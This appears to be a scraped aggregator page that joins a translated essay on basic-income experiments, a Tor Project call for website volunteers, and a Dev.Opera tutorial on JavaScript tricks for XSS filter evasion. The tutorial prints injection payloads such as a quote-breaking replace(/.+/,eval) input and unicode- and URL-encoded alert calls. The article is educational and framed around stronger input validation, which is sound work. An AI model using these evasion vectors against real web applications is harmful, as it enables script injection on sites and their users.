Bernard and his fellow villagers are not the only ones who got lucky. In 2008, the Ugandan government gave about $400 to almost 12,000 youths between the ages of 16 and 35. Just money – no questions asked. And guess what? The results were astounding. A mere four years later, the youths’ educational and entrepreneurial investments had caused their incomes to increase by almost 50%. Their chances of being employed had increased by 60%.The study: 'Experimental Evidence from Uganda'.

Another Ugandan program awarded $150 to 1,800 poor women in the North of the country. Here, too, incomes went up significantly. The women who were supported by an aid worker were slightly better off, but later calculations proved that the program would have been even more effective had the aid workers’ salary simply been divided among the women as well.And the other study from Uganda.

Studies from all over the world drive home the exact same point: free money helps. Proven correlations exist between free money and a decrease in crime, lower inequality, less malnutrition, lower infant mortality and teenage pregnancy rates, less truancy, better school completion rates, higher economic growth and emancipation rates. ‘The big reason poor people are poor is because they don’t have enough money’, economist Charles Kenny, a fellow at the Center for Global Development, dryly remarked last June. ‘It shouldn’t come as a huge surprise that giving them money is a great way to reduce that problem.’Read his article here.

Free-money programs have flourished in the past decade

In the 2010 work Just Give Money to the Poor, researchers from the Organization for Economic Cooperation and Development (OECD) give numerous examples of money being scattered successfully. In Namibia, malnourishment, crime and truancy fell 25 percent, 42 percent and nearly 40 percent respectively. In Malawi, school enrollment of girls and women rose 40 percent in conditional and unconditional settings. From Brazil to India and from Mexico to South Africa, free-money programs have flourished in the past decade. While the Millenium Development Goals did not even mention the programs, by now more than 110 million families in at least 45 countries benefit from them.

OECD researchers sum up the programs’ advantages: (1) households make good use of the money, (2) poverty decreases, (3) long-term benefits in income, health, and tax income are remarkable, (4) there is no negative effect on labor supply – recipients do not work less, and (5) the programs save money.Here is a presentation of their findings.Why would we send well-paid foreigners in SUVs when we could just give cash? This would also diminish risk of corrupt officials taking their share. Free money stimulates the entire economy: consumption goes up, resulting in more jobs and higher incomes.

‘Poverty is fundamentally about a lack of cash. It's not about stupidity,’ author Joseph Hanlon remarks. ‘You can't pull yourself up by your bootstraps if you have no boots.’

An old idea

The idea has been propagated by some of history’s greatest minds. For example: Thomas Paine, John Stuart Mill, H.G. Wells, George Bernard Shaw, John Kenneth Galbraith, Jan Tinbergen, Martin Luther King and Bertrand Russell. Thomas More dreamt of it in his famous Utopia (1516). Countless economists and philosophers, many of them Nobel laureates, would follow suit. Proponents cannot be pinned down on the political spectrum: it appeals to both left- and right-wing thinkers. Even the founders of neoliberalism, Friedrich Hayek and Milton Friedman supported the idea. Article 25 of the Universal Declaration of Human Rights (1948) directly refers to it. 

The basic income. 

And not just for a few years, in developing countries only, or merely for the poor – but free money as a basic human right for everyone. The philosopher Philippe van Parijs has called it ‘the capitalist road to communism.’ A monthly allowance, enough to live off, without any outside control on whether you spend it well or whether you even deserve it. No jungle of extra charges, benefits, rebates - all of which cost tons to implement. At most with some extras for the elderly, unemployed and disabled.

The basic income - it is an idea whose time has come.

Mincome, Canada

In an attic of a warehouse in Winnipeg, Canada, 1,800 boxes are accumulating dust. The boxes are filled with data – tables, graphs, reports, transcripts – from one of the most fascinating social experiments in postwar history: Mincome. 

Evelyn Forget, professor at the University of Manitoba, heard about the experiment in 2004. For five years, she courted the Canadian National Archive to get access to the material. When she was finally allowed to enter the attic in 2009, she could hardly believe her eyes: this archive stored a wealth of information on the application of Thomas More’s age-old ideal. 

One of the almost 1,000 interviews tucked away in boxes was with Hugh and Doreen Henderson. Thirty-five years earlier, when the experiment took off, he worked as a school janitor and she took care of their two kids. Life had not been easy for them. Doreen grew vegetables and they kept their own chickens in order to secure their daily food supply.

From that moment, money was no longer a problem

One day the doorbell rang. Two men wearing suits made an offer the Henderson family couldn’t refuse. ‘We filled out forms and they wanted to see our receipts’, Doreen remembers. From that moment, money was no longer a problem for the Henderson family. Hugh and Doreen Read more about their experience here. entered Mincome – the first large-scale social experiment in Canada and the biggest experiment implementing a basic income ever conducted. 

In March 1973 the governor of the province had decided to reserve $17 million for the project. The experiment was to take place in Dauphin, a small city with 13,000 inhabitants north of Winnipeg. The following spring researchers began to crowd the town to monitor the development of the pilot. Economists were keeping track of people’s working habits, sociologists looked into the experiment’s effects on family life and anthropologists engaged in close observation of people’s individual responses.

The basic income regulations had to ensure no one would drop below the poverty line. In practice this meant that about a 1,000 families in Dauphin, covering 30% of the total population, received a monthly paycheck. For a family of five, the amount would come down to $18,000 a year today (figure corrected for inflation). No questions asked.

Four years passed until a round of elections threw a spanner in the works. The newly elected conservative government didn’t like the costly experiment that was financed by the Canadian taxpayer for 75%. When it turned out that there was not even enough money to analyze the results, the initiators decided to pack the experiment away. In 1,800 boxes.

The Dauphin population was bitterly disappointed. At its start in 1974, Mincome was seen as a pilot project that might eventually go national. But now it seemed to be destined for oblivion. ‘Government officials opposed to Mincome didn't want to spend more money to analyze the data and show what they already thought: that it didn't work,’ one of the researchers remembers. ‘And the people who were in favor of Mincome were worried because if the analysis was done and the data wasn't favorable then they would have just spent another million dollars on analysis and be even more embarrassed.’

When professor Forget first heard of Mincome, no one knew how the experiment had truly worked out. However, 1970 had also been the year Medicare, the national health insurance system, had been implemented. The Medicare archives provided Forget with a wealth of data allowing her to compare Dauphin to surrounding towns and other control groups. For three years, she analyzed and analyzed, consistently coming to the same conclusion: 

Mincome had been a great success. 

From experiment to law

‘Politicians feared that people would stop working, and that they would have lots of children to increase their income,’ professor Forget says. You can find one of her lectures here.Yet the opposite happened: the average marital age went up while the birth rate went down. The Mincome cohort had better school completion records. The total amount of work hours decreased by only 13%. Breadwinners hardly cut down on their hours, women used the basic income for a couple of months of maternity leave and young people used it to do some extra studying.

Forget’s most remarkable discovery is that hospital visits went down by 8,5%. This amounted to huge savings (in the United States it would be more than $200 billion a year now). After a couple of years, domestic violence rates and mental health also saw improvement. Mincome made the entire town healthier. The basic income continued to influence following generations, both in terms of income and health.

Dauphin, the town with no poverty, was one of five North-American basic income experiments. Four U.S. projects preceded it. Today, few people know how close the US was in the sixties to implementing a solid social welfare system that could stand the comparison with that of most Western-European countries nowadays. In 1964, president Lyndon B. Johnson declared a ‘war on poverty.’ Democrats and Republicans were united in their ambition to fundamentally reform social security. But first more testing was needed.

Several tens of millions were made available to test the effects of a basic income among 10,000 families in Pennsylvania, Indiana, North Carolina, Seattle and Denver. The pilots were the first large-scale social experiments differentiating between various test and control groups. The researchers were trying to find the answers to three questions. 1: Does a basic income make people work significantly less? 2: If so, will it make the program unaffordable? 3: And would it consequently become politically unattainable? 

The answers: no, no and yes.

The decrease in working hours turned out to be limited. ‘The ‘laziness’ contention is just not supported by our findings’, the chief data analyst of the Denver experiment said. ‘There is not anywhere near the mass defection the prophets of doom predicted.’ On average, the decline in work hours amounted to 9 percent per household. Like in Dauphin, the majority of this drop was caused by young mothers and students in their twenties.

‘These declines in hours of paid work were undoubtedly compensated in part by other useful activities, such as search for better jobs or work in the home,’ an evaluative report of a Seattle project concluded.  A mother who had never finished high school got a degree in psychology and went on to a career in research. Another woman took acting classes, while her husband started composing. ‘We’re now self-sufficient, income-earning artists’, they told the researchers. School results improved in all experiments: grades went up and dropout rates went down. Nutrition and health data were also positively affected – for example, the birth weight of newborn babies increased.

For a while, it seemed like the basic income would fare well in Washington.

WELFARE REFORM IS VOTED IN HOUSE, a NYT headline on April 17, 1970 read. An overwhelming majority had endorsed President Nixon’s proposal for a modest basic income. But once the proposal got to the Senate, doubts returned. ‘This bill represents the most extensive, expensive and expansive welfare legislation ever handled by the Committee on Finance,’ one of the senators said.

Then came that fatal discovery: the number of divorces in Seattle had gone up by more than 50%. This percentage made the other, positive results seem utterly uninteresting. It gave rise to the fear that a basic income would make women much too independent. For months, the law proposal was sent back and forth between the Senate and the White House, eventually ending in the dustbin of history.

Later analysis would show that the researchers had made a mistake – in reality the number of divorces had not changed.

Futile, dangerous and perverse

‘It Can Be Done! Conquering Poverty in the US by 1976’, James Tobin, who would go on to win a Nobel Prize, wrote in 1967. At that time, almost 80% of the American population was in favor of adopting a small basic income. Here is an interesting article about this episode of American history.Nevertheless, Ronald Reagan sneered years later: ‘In the sixties we waged a war on poverty, and poverty won.’

Almost 80% of the American population was in favor of adopting a small basic income

Milestones of civilization are often first considered impossible utopias. Albert Hirschman, one of the great sociologists of the previous century, wrote that utopian dreams are usually rebutted on three grounds: futility (it is impossible), danger (the risks are too big) and perversity (its realization will result in the opposite: a dystopia). Yet Hirschmann also described how, once implemented, ideas previously considered utopian are quickly accepted as normal.

Not so long ago, democracy was a grand utopian ideal. From the radical philosopher Plato to the conservative aristocrat Joseph de Maistre, most intellectuals considered the masses too stupid for democracy. They thought that the general will of the people would quickly degenerate into some general’s will instead. Apply this kind of reasoning to the basic income: it would be futile because we would not be able to afford it, dangerous because people would stop working, and perverse because we would only have to work harder to clean up the mess it creates. 

But wait a second. 

Futile? For the first time in history we are rich enough to finance a robust basic income. It would allow us to cut most of the benefits and supervision programs that the current social welfare system necessitates. Many tax rebates would be redundant. Further financing could come from (higher) taxing of capital, pollution and consumption.

Eradicating poverty in the United States would cost $175 billion – a quarter of the country’s $700 billion military budget. 

A quick calculation. The country I live in, Holland, has 16.8 million inhabitants. Its poverty line is set at $1,300 a month. This would make for a reasonable basic income. Some simple math would set the cost on 193.5 billion euro annually, about 30% of our national GDP. That’s an astronomically high figure. But remember: the government already controls more than half of our GDP. It does not keep the Netherlands from being one of the richest, most competitive and happiest countries in the world.

The basic income that Canada experimented with – free money as a right for the poor – would be much cheaper. Eradicating poverty in the United States would cost $175 billion, economist Matt Bruenig recently calculated – a quarter of the country’s $700 billion military budget. You can find his calculation here. Still, a system that only helps the poor confirms the divide with the well-to-do. ‘A policy for the poor is a poor policy,’ Richard Titmuss, the mastermind of the British welfare state, once wrote. A universal basic income, on the other hand, can count on broad support since everyone benefits.

Dangerous? Indeed, we would work a little less. But that’s a good thing, with the potential of working wonders for our personal and family lives. A small group of artists and writers (‘all those whom society despises while they are alive and honors when they are dead’ – Bertrand Russell) may actually stop doing paid work. Nevertheless, there is plenty of evidence that the great majority of people, regardless of what grants they would receive, want to work. Unemployment makes us very unhappy. 

One of the perks of the basic income is that it stimulates the ‘working poor’ – who are, under the current system, more secure receiving welfare payments - to look for jobs. The basic income can only improve their situation; the grant would be unconditional. Minimum wage could be abolished, improving employment opportunities at the lower ends of the labor market. Age would no longer need to form an obstacle to finding and keeping employment (as older employees would not necessarily earn more) thereby boosting overall labor participation.

The welfare state was built to provide security but degenerated in a system of shame 

Perverse? On the contrary, over the last decades our social security systems have degenerated into perverse systems of social control. Government officials spy on people receiving welfare to make sure they are not wasting their money. Inspectors spend their days coaching citizens to help them make sense of all the necessary paperwork. Thousands of government officials are kept busy keeping an eye on this fraud-sensitive bureaucracy. The welfare state was built to provide security but degenerated in a system of distrust and shame. 

Think different

It has been said before. Our welfare state is out of date, based on a time in which men were the sole breadwinners and employees stayed with one company for their entire careers. Our pension system and unemployment protection programs are still centered around those lucky enough to have steady employment. Social security is based on the wrong premise that the economy creates enough jobs. Welfare programs have become pitfalls instead of trampolines.

Never before has the time been so ripe to implement a universal and unconditional basic income. Our ageing societies are challenging us to keep the elderly economically active for as long as possible. An increasingly flexible labor market creates the need for more security. Globalization is eroding middle-class wages worldwide. Women’s emancipation will only be completed when a greater financial independence is possible for all. The deepening divide between the low- and highly educated means that the former are in need of extra support. The rise of robots and the increasing automatization of our economy could cost even those at the top of the ladder their jobs. 

Legend has it that while Henry Ford II was giving a tour around a new, fully automatic factory to union leader Walter Reuther in the 1960s, Ford joked:

'Walter, how are you going to get those robots to pay your union dues?'

Reuther is said to have replied:

'Henry, how are you going to get them to buy your cars?'

A world where wages no longer rise still needs consumers. In the last decades, middle-class purchasing power has been maintained through loans, loans and more loans. The Calvinistic reflex that you have to work for your money has turned into a license for inequality.

No one is suggesting societies the world over should implement an expensive basic income system in one stroke. Each utopia needs to start small, with experiments that slowly turn our world upside down — like the one four years ago in the City of London.Switzerland may be the first country to introduce a basic income.One of the aid workers later recalled: 'It’s quite hard to just change overnight the way you’ve always approached this problem. These pilots give us the opportunity to talk differently, think differently, describe the problem differently.'

That is how all progress begins.

Translated from Dutch by Tabitha Speelman.

The short version of this article was published in The Washington Post. 'Free money might be the best way to end poverty'

 

Tor website needs your help! | The Tor Blog

$
0
0

Comments:"Tor website needs your help! | The Tor Blog"

URL:https://blog.torproject.org/blog/tor-website-needs-your-help


Tor started more than eleven years ago. The project website has gone through three major revisions in that time. It looks like it’s again time for important changes.

Tor has shifted in the recent years from being a project prominently used by researchers, developers, and security experts to the wider audience of anyone concerned about their privacy. Tor’s user base continues to grow. While this is a very good news for the anonymity of every Tor user, we need to make information that matters more accessible and better structured. The support team already receive close to 30 new requests every day, and it would be a better experience for newcomers, users, and journalists to directly find their answers.

Creating the ideal website for Tor is not an easy task. We have very diverse audiences with very diverse expectations. We need to gather information from different sources. Some pages should be multi-lingual. As outdated information could endanger our users, it should be easy to keep up-to-date. Our users deserve beautiful, clear, and comprehensive graphics to allow everyone to quickly understand Tor better. We’ve had some starting discussions, but we’re very much in need of your help.

Up to the challenge? Do you want to help improving a website visited everyday by millions of people looking for protection against surveillance? Then feel free to join the website team mailing list. We need usability experts, technical writers, designers, code wizards of the modern web, static website generator experts, documentalists… Join us and help!

JavaScript for hackers - Dev.Opera

$
0
0

Comments:"JavaScript for hackers - Dev.Opera"

URL:http://dev.opera.com/articles/view/opera-javascript-for-hackers-1/


By garethheyes

Introduction

I love to use JavaScript in unexpected ways, to create code that looks like it shouldn't work but does, or produces some unexpected behavior. This may sound trivial, but the results I've found lead to some very useful techniques. Each of the techniques described can be used for XSS filter evasion, which was my original intention when developing them. However, learning such JavaScript can dramatically increase your knowledge of the language, helping you become better at cleaning up input, and increase web application security.

So read on and enjoy my weird and wonderful JavaScript hacks.

RegExp replace can execute code

When using regular expressions with replace the second argument supports a function assignment. In Opera it seems you can use this argument to execute code. For example, check out the code snippet below:

'XSS'.replace(/XSS/g,alert)

This results in alert('XSS'); this works because the match from the RegExp is passed to the alert function as an argument. Normally you would use a function to perform another routine on the matched text, like so:

'somestring'.replace(/some/,function($1){//do something with some})

But as you can see in the first example in this section, instead of a user defined function we are executing a native alert call, and the arguments are passed to the native call from the regular expression. It's a cool trick and could be used to evade some XSS filters, for example if you inject a string then proceed with a dot you can then call any function you like.

To see how this is used in a XSS context, imagine we have an unfiltered " in the string in which an injection occurs, such as a JavaScript event or a script tag. First we inject our payload alert(1), then we break out of the quotes - " - and continue our regular expression:

.replace(/.+/,eval)//

Notice I use eval here to execute any code I like and the regular expression matches everything so that the full payload is passed to eval.

If I put all the code together and show you the output of the page it is easier to understand what is going on:

Page output:

<script>somevariableUnfiltered="YOUR INPUT"</script>

The above code is common in analytics scripts where your search string is stored by an advertising company. You often don't see these scripts but if you view the source of a web page you'll find that they are a regular occurrence; forums are another place where they are prevalent. "YOUR INPUT" is the string you have control of; this is also referred to as DOM based XSS if the input isn't filtered correctly.

Input:

alert(1)".replace(/.+/,eval)//

Resulting output:

<script>somevariableUnfiltered="alert(1)".replace(/.+/,eval)//"</script>

Notice the single line comment used to remove the trailing quote.

Unicode escapes

Although it's not possible to use parentheses when escaping unicode characters, you can escape the name of the function being called, for example:

\u0061\u006c\u0065\u0072\u0074(1)

This calls alert(1); \u indicates it's a unicode escape and the hex number after specifies the character. \u0061 is "a" and so on.

Mixing and matching unicode escapes is possible with normal characters; the example below demonstrates this:

\u0061lert(1)

You can also include them in strings and even evaluate them using eval. Unicode escapes are different to normal hex or octal escapes because they can be included in a string, or a reference to a function, variable or object.

The example below shows how to use unicode escapes that are evaluated and split into separate parts:

eval('\\u'+'0061'+'lert(1)')

By avoiding normal function names like alert, we can fool XSS filters into injecting our code. This very example was used to bypass PHPIDS (an open source IDS system), which resulted in the rules subsequently being made much stronger. If you are considering decoding JavaScript for malware analysis at runtime you need to consider the possible ways that multiple levels of encoding can work; as you can see from this example it won't be a easy task.

JavaScript parser engine

JavaScript is a very dynamic language. It can execute a surprising amount of code that at first glance doesn't look valid, however once you know how the parsers work, you begin to understand the logic behind it.

JavaScript doesn't know the result of a function until it is executed, and obviously it has to call the function to return the variable type. This leads to an interesting quirk - for example, if the returning function doesn't return a valid value for the code block, a syntax error will occur after the execution of the function.

What does this mean in English? Well, code speaks louder than words - check this example out

+alert(1)--

The alert function executes and returns undefined but by that time it is too late - the decrement operator is expecting a number and therefore raises an error.

Here's a few more valid examples that don't raise errors but are interesting nevertheless.

+alert(1)
1/alert(1)
alert(1)>>>/abc/

You might think the above examples are pointless but in fact they offer great insight into how Javascript works. Once you understand the small details the bigger picture becomes clear and the way that your code executes can help you understand how the parser works. I find these sort of examples useful when tracking down syntax errors and DOM based XSS, and exploiting XSS Filters.

Throw, Delete what?

You can use the delete operator in ways that you wouldn't at first expect, which results in some pretty wacky syntax. Lets see what happens if we combine the throw, delete, not and typeof operators?

throw delete~typeof~alert(1)

Even though you'd think it couldn't possibly work, it's possible to call delete on a function call and it still executes:

delete alert(1)

Here are a few more examples

delete~[a=alert]/delete a(1)
delete [a=alert],delete a(1)

At first glance you'd think that they would raise a syntax error but when examining the code further it sorta makes sense. The parser finds a variable assignment first within a array, performs the assignment and then deletes the array. Likewise the delete is performed after a function call because it needs to know the result of the function before it can delete the returned object, even if it is null.

Again these examples have been used to defeat XSS filters because they are often trying to match valid syntax and they don't expect the obscure nature of the code. You should consider such examples when programming your application data validation.

Global objects are statements

In certain instances of XSS filter evasion, it can be useful to send English-like text hidden within a vector. Clever systems like PHPIDS use English and vector comparisons to determine if a request is an attack or not, so it is a useful way to test these systems.

Using global objects/functions on their own can produce English-like code blocks. In fact, on the sla.ckers security forum we had a little game to produce English-like sentences in JavaScript. To get an idea of how it works, check out the following example:

stop, open, print && alert(1)

I coined the name Javascriptlish because it's possible to produce some crazy looking code:

javascript : /is/^{ a : ' weird ' }[' & wonderful ']/" language "
the_fun: ['never '] + stop['s']

We use the regular expression /is/ with the operator ^ and then create a object { a : 'weird'} (which has a property a and an assignment of weird.) Then we look for a property ' & wonderful ' within the object we just created, which is then divided by a string of language.

Next we use a label called the_fun and an array with never , use a global function called stop and check for a property of s ... all of which is valid syntax.

Getters/Setters fun

When Firefox added the custom syntax for setters it enabled some interesting XSS vectors that didn't use parentheses. Opera doesn't support a custom syntax yet - this is good from a security point of view but not from a JavaScript hacker's perspective.

Opera does however support the standard defineSetter syntax. This enables us to call functions via assignments, which still has some use for XSS filter evasion:

defineSetter('x',alert); x=1;

In case you're not aware of setters/getters, the example above creates a setter for the global variable x. A setter is called whenever a variable is set with something and the argument is supplied from whatever has been assigned. The second argument is the function to be called on assignment, which is alert. Then, when x is assigned the value of 1, the alert function is called with 1 as the argument.

Location allows url encoding

The location object allows url encoding within the JavaScript code. This allows you to further obfuscate XSS vectors by double encoding them.

location='javascript:%61%6c%65%72%74%28%31%29'

Combining them with unicode escapes can hide strings quite nicely:

location='javascript:%5c%75%30%30%36%31%5c%75%30%30%36%63%5c %75%30%30%36%35%5c%75%30%30%37%32%5c%75%30%30%37%34(1)'

The first example works because the URL bar in Opera accepts urlencoded strings - you can hide JavaScript syntax by url encoding it. This is useful because when it is passed within a XSS vector you can double url encode it to help further with filter evasion.

The second example combines the first technique with the unicode escape technique mentioned previously. So when you decode the string it results in the unicode representation of alert which is \u0061\u006c\u0065\u0072\u0074.

This article is licensed under a Creative Commons Attribution, Non Commercial - Share Alike 2.5 license.

[TLS] This working group has failed

Viewing all 9433 articles
Browse latest View live